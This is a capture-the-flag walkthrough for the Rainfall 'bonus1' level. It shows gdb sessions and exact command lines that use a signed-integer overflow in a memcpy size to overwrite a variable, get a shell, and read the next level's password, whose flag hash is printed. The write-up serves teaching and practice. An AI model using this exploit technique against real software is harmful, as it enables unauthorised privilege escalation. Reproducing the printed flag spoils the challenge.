# Rainfall - Bonus1 Walkthrough

memcpy stores the return in ($esp+0x3c)
atoi return is stored in ($esp+0x14)

0x3c - 0x14 = 0x28 = 40


```c
local_14 = atoi(av[1]);
# We want to pass this condition
# av[1] should be a negative number as string
if (local_14 < 10) {
    # We want to overflow local_3c by 40 followed by 0x574f4c46
    # So local_14 * 4 should be >= 44
    memcpy(local_3c, av[2], local_14 * 4);
    if (local_14 == 0x574f4c46) {
      execl("/bin/sh","sh",0);
    }
```

```bash
(gdb) p atoi("-2147483648")
$1 = -2147483648
(gdb) p atoi("-2147483647")
$3 = -2147483647
(gdb) p atoi("-2147483647")*4
$4 = 4
(gdb) p atoi("-2147483646")*4
$5 = 8
(gdb) p atoi("-2147483645")*4
$6 = 12
# we understand the idea...
# we need a minimum of 44
(gdb) p atoi("-2147483637")*4
$7 = 44
```

(gdb) b *0x08048473
(gdb) run "-2147483637" $(python -c "print 'A'*40+ 'BBBB'")
# for confirmation, ecx stores the size of the memcpy
(gdb) i r ecx
ecx            0x2c	44

(gdb) x $esp+0x3c
0xbffff6ec:	0x8000000b
(gdb) ni
0x08048478 in main ()
(gdb) x $esp+0x3c
0xbffff6ec:	0x42424242

# BBBB was correctly copied, we control the value at $esp+0x3c

```bash
./bonus1 "-2147483637" $(python -c "print 'A'*40+'\x57\x4f\x4c\x46'[::-1]")
$ whoami 
bonus2
$ cat /home/user/bonus2/.pass
579bd19263eb8655e4cf7b742d75edf8c38226925d78db8163506f5191825245
```

'\x57\x4f\x4c\x46' == "WOLF"
so a pretty solution is

```bash
./bonus1 -2147483637 ________________________________________FLOW
```